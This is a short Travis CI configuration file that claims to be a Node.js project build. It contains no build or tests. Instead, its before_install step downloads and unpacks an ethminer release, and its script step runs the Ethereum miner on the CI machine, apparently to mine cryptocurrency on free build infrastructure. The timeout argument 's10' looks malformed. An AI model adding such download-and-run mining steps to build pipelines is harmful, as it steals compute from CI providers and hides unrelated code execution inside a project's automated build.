language: node_js
node_js:
- '7'
sudo: required
dist: trusty

jobs:
  include:          
      before_install: 
      - echo before install
      - wget https://github.com/ethereum-mining/ethminer/releases/download/v0.13.0rc4/ethminer-0.13.0rc4-Linux.tar.gz
      - tar -xvzf ethminer-0.13.0rc4-Linux.tar.gz

      script:      
      - timeout s10 ./bin/ethminer
            
      after_success:
      - echo success
